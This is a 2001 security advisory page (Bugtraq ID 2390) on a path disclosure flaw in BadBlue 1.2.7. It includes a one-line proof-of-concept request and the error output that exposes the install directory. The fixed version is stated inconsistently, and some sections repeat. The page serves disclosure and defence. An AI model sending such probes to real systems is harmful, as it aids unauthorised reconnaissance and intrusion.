Working Resources BadBlue Path Disclosure Vulnerability
BID:2390
Info
Working Resources BadBlue Path Disclosure Vulnerability
| Bugtraq ID: | 2390 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | Yes |
| Published: | Feb 20 2001 12:00AM |
| Updated: | Feb 20 2001 12:00AM |
| Credit: | Discovered and posted to Bugtraq by SNS Research <[email protected]> on Feb 20, 2001. |
| Vulnerable: |
Working Resources Inc. BadBlue 1.2.7 |
| Not Vulnerable: |
Working Resources Inc. BadBlue 1.2.8 |
Exploit / POC
Working Resources BadBlue Path Disclosure Vulnerability
The following exploit has been provided by SNS Research <[email protected]>:
http://target/ext.dll
will result in:
[Error: opening c:\program files\badblue\pe\default.htx (2)]
The following exploit has been provided by SNS Research <[email protected]>:
http://target/ext.dll
will result in:
[Error: opening c:\program files\badblue\pe\default.htx (2)]
Solution / Fix
Working Resources BadBlue Path Disclosure Vulnerability
Solution:
Working Resources Inc has addressed this issue in BadBlue 1.02.8:
http://www.badblue.com/down.htm
Solution:
Working Resources Inc has addressed this issue in BadBlue 1.02.8:
http://www.badblue.com/down.htm
References
Working Resources BadBlue Path Disclosure Vulnerability
References:
References:
- BadBlue Product Homepage (Working Resources Inc)